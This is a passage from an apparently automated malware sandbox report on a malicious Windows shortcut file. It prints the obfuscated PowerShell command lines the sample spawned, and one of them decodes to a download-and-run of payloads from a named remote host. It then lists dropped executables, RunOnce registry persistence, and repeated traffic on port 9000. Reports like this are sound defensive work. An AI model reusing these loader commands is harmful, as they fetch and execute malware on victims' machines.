AAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABIAHQANgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAHMAVwBmADIAOwAmACAAKABbAHMAYwByAGkAcAB0AGIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgAKAAnAGUAJwArACcAeABpACcAKwAnAHQAJwApACAALQBqAG8AaQBuACAAJwAnACkAKQApAA==
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wrdZ($UvhG){return -split ($UvhG -replace '..', '0x$& ')};$ERHgk = wrdZ('ECA586FB867E54D080F88AB849BFB94F298E9D4D174F6B1F2F81610C3540C56191E34FB7B2DF87630478E180DACA97337CF338C5F0549579E18CC1A49A1339F9691FAE2EDAAC0D6E2AB4913030D45E7F9C40731A7B0ED45F438D15D573AB5E4816A3D8CA82DAA342D630EDB6E24E85F4D05E0447A728444A18214CD35DB1FD5C4C677BF1EB6DD62A0D4B42A5F996D056A8C58BF2B2ADC007CA0004F35EEDF7DB06CC47C0E8175257375360952646DDCE12F86A389A2FB4F08F04DF71ABBD10CA19394807E45AE262B4CF2BD880666BE9808038992E086339CA69F730462BD5BA268BEA9591B45C3FDDC4B990452C3C5B083B1D8A99DB9D344BE7F259679F7994FBAA4E272654402905FEB107236FDE83FA247F6DFF5EE2DE2FBE984DE8D33A5077EC31D65DAE7AAC344DB18BADD0E59C3DC0A20AA1776387E75ED82F6F21E81D436D435FE7641490C8BB3BE615F9D76B1F8A1323001EC29CB1DC720A20647927291ABFCCFF409B1F94A878B0CDB0AFF68E11DAF8B2CCB95D3B395C11FB1D2F79673936E5F6AF545B019BFDE71CDAC1667709524F9244C6D8B3198F1F28C92F507AF233B70FD15099184E521AA3D1F4EB4613BE4CC9617FD5EE373CB05A7B164A2B6211387C494F7FC2F64FB4B0EEC11B39FFCC4E09EE10E96070192D4E0E2AD737B857A3BA8766EF8B454E4CC9BAE60331184407821C7F5A417DEBB95885CD929FAC64B5913D45E20BA92710C789EA36BC01ED629BAAEEFB8F420E9D966E4669DB7E1EE213C1001073B4FB67BB454BA80B0144D096E4FA221E9AB74FB2FDA2CBBA9C669EB50610B810047A6A75A1E41407350666C1B141836EA4FB3C9588111CE216EB2E451248C7008EA09561E08463428A981B69214151A19DD58483CB4A07DA879953AA3FDBF8EC16A79ACD16FBF54B34E405FCE7D15727908982C71DB4EC3160579745FCBC610756535558573F49618C7606881E9C8F026001D9C1C40FD2462CC1EC3DCF620D160F23D6F789F8CAA4EE9835FD65AA1D0E0278809DE0D85C1295E58C782AAFF7016B75C2FBB65FE1F73E7B038C89BAA57C32930D22EE8C71A06F4A2C738995833A10226ECDFB07ECD5F6DA31617797E009FA791AB33D9189A3A8E44428EFC9D7C6FAC3474FD38038FE910BBB036CFF902B287315F807FAAA06AED95210DDE82DAEAC0A523D871AE53C0EF75EF61B9A57F8F33A81ABD5D297C8FA835397595E7202A8E9007FFC7EDE814D001B798D89293879C641BE0707A91665E5503FECF99138AC09675DB1C070F4CF90193587A5FFC1CEE76401544370EB81704BA787C0CD04C9585C45A98FE309B624E2A8DF58992BFB2E28E05D3E083F40D7259170B815F21C934D9A6B716FB374544D200AC2F51F83FF6015BF31FAF855ACD6F94C4EDCFFE1B1B1E84CD0DCE3476BE438811875890C244AF355F5A99D60D3FE596651A7FCE949EF11B75A3E47270440D77D7293E40B99F248B7EA50AE844851B9FCECC2A42A543848822154E0BDE72E753A37ABBC37D5A523E44824FDECB7EA3DA94AE0BC489AFB57E7FF8B9D330E6B6CF749C38703F35FBB8C7524C1CC772CB6E97F52B9A303F765EEA1CF88781CF03DBAF4E05C5E83D04900C62AE76C9060D2EF02C6358A9C35D3C5CADDA4513FE8720161EE8D258C9D8738089620A44FDD02266B9393340D2A4D6DF53670CE0EAC8ADF596CBD6821F99D9AA7D32C9C1C8CDD6A112CF9684123E95FA54979737993CA2ED54A8E4E7B526955F3B82D4D1180DCF858A68E630366BAE559198412C920E3DF514DC1275386D42B0CF7D7800F9A9C56DF30AC55BB715221A65AC5F1B6C047475AF5D327C3E5F8421DC5507C9898E1CA30BC70D6ED81C7FBE88DC6473A1B361F63E277C1B83D0BA47D9D3A44BB1ED147D9E3D1391B4E0C9728E31F4600C8F8CDC7EA1BB362F215217B57B713C7F2C9B60FFBB1ABF	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -WindowStyle Hidden -EncodedCommand JABhAEoAdwA3AD0AIgB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgA7ACQAawBOAHIAMwA9AC0AagBvAGkAbgAoACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0AHsAWwBjAGgAYQByAF0AJABfAH0AfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKwAiAC4AYgBpAG4AIgA7ACQAagBYAHEANAA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAIAAtAEMAaABpAGwAZABQAGEAdABoACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwB8AEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAB7AFsAYwBoAGEAcgBdACQAXwB9ACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKQA7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAagBYAHEANAAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQB8AE8AdQB0AC0ATgB1AGwAbAA7ACQAcABIAHQANgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAYQBKAHcANwA7ACQAcwBXAGYAMgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAawBOAHIAMwA7ACQAdgBQAGIAOQA9ACIAaAB0AHQAcABzADoALwAvAGMAbgBkAGUAZgAxAC4AZwByAGUAZQBuAC0AcABhAHQAaAB3AGEAeQBzAC4AcwBoAG8AcAAvAGEAcABpAC8AdQB6AC8ANwA1ADUAMgA5ADcAMwA2ADUAMAAvAHUALgBiAGkAbgAiADsAJAB4AFEAZAA1AD0AIgBoAHQAdABwAHMAOgAvAC8AYwBuAGQAZQBmADEALgBnAHIAZQBlAG4ALQBwAGEAdABoAHcAYQB5AHMALgBzAGgAbwBwAC8AYQBwAGkALwB1AHoALwA3ADUANQAyADkANwAzADYANQAwAC8AbgBuAG4ALgBiAGkAbgAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdgBQAGIAOQAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABIAHQANgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB4AFEAZAA1ACAALQBPAHUAdABGAGkAbABlACAAJABzAFcAZgAyACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABIAHQANgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAHMAVwBmADIAOwAmACAAKABbAHMAYwByAGkAcAB0AGIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgAKAAnAGUAJwArACcAeABpACcAKwAnAHQAJwApACAALQBqAG8AaQBuACAAJwAnACkAKQApAA==	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_0038C6D9 LoadLibraryA,GetProcAddress,

20_2_0038C6D9

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFE7DE700BD pushad ; iretd	4_2_00007FFE7DE700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFE7DE700BD pushad ; iretd	5_2_00007FFE7DE700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFE7CC900BD pushad ; iretd	9_2_00007FFE7CC900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFE7CD60773 pushad ; ret	9_2_00007FFE7CD60774
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFE7CC900BD pushad ; iretd	11_2_00007FFE7CC900C1
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_00338B75 push ecx; ret	20_2_00338B88
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016DC149 push 016DC175h; ret	20_2_016DC16D
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E510D push 016E51B8h; ret	20_2_016E51B0
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E510B push 016E51B8h; ret	20_2_016E51B0
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E91E5 push 016E9211h; ret	20_2_016E9209
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E51BD push 016E524Dh; ret	20_2_016E5245
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E918D push 016E91D9h; ret	20_2_016E91D1
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E936D push 016E9399h; ret	20_2_016E9391
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016EB359 push 016EB385h; ret	20_2_016EB37D
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E7355 push 016E7381h; ret	20_2_016E7379
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E9335 push 016E9361h; ret	20_2_016E9359
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E9333 push 016E9361h; ret	20_2_016E9359
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016DC309 push ebp; ret	20_2_016DC30A
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016EC3E1 push 016EC40Dh; ret	20_2_016EC405
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E83C9 push 016E8446h; ret	20_2_016E843E
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E83C7 push 016E8446h; ret	20_2_016E843E
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016EC3D9 push 016EC40Dh; ret	20_2_016EC405
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016EC386 push 016EC40Dh; ret	20_2_016EC405
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016D5265 push 016D5291h; ret	20_2_016D5289
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E9255 push 016E9281h; ret	20_2_016E9279
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E921D push 016E9249h; ret	20_2_016E9241
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E92C5 push 016E92F1h; ret	20_2_016E92E9
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E928D push 016E92B9h; ret	20_2_016E92B1
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016D529D push 016D55A1h; ret	20_2_016D5599
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016D5575 push 016D55A1h; ret	20_2_016D5599
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E7551 push 016E757Dh; ret	20_2_016E7575

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\mshta.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\71532689\updater.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	File created: C:\ehcfdbh\AutoIt3.exe			Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce bhcbhah
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce bhcbhah
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce bhcbhah
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce bhcbhah

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 50086 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 50098 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 50101 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50108
